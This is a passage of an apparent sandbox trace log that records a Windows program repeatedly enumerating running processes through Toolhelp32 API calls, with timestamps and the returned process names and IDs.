Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.828] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0106.829] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0106.874] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0106.875] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.876] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.877] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0106.878] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0106.879] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0106.880] CloseHandle (hObject=0xbc) returned 1 [0106.880] Sleep (dwMilliseconds=0x12c) [0107.203] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0107.210] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.210] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0107.211] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0107.212] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.213] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0107.213] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.214] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0107.215] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0107.215] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0107.216] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0107.217] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.217] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.218] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.219] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.220] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.220] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0107.221] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.222] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.222] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0107.224] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.225] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.226] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0107.227] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0107.228] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0107.229] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.231] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.232] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0107.233] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0107.234] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0107.235] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0107.236] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0107.237] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0107.238] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0107.239] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0107.241] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0107.242] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0107.246] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0107.247] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0107.248] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0107.249] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0107.250] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0107.252] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0107.253] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0107.253] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0107.255] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0107.256] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0107.257] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.258] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0107.259] CloseHandle (hObject=0xc4) returned 1 [0107.259] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0107.263] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.264] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0107.265] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0107.266] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.266] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0107.267] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.268] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0107.269] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0107.270] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0107.271] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0107.272] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.272] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.273] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.274] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.274] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.275] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0107.276] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.277] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.277] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0107.279] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.280] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.282] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0107.283] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0107.285] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0107.286] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, 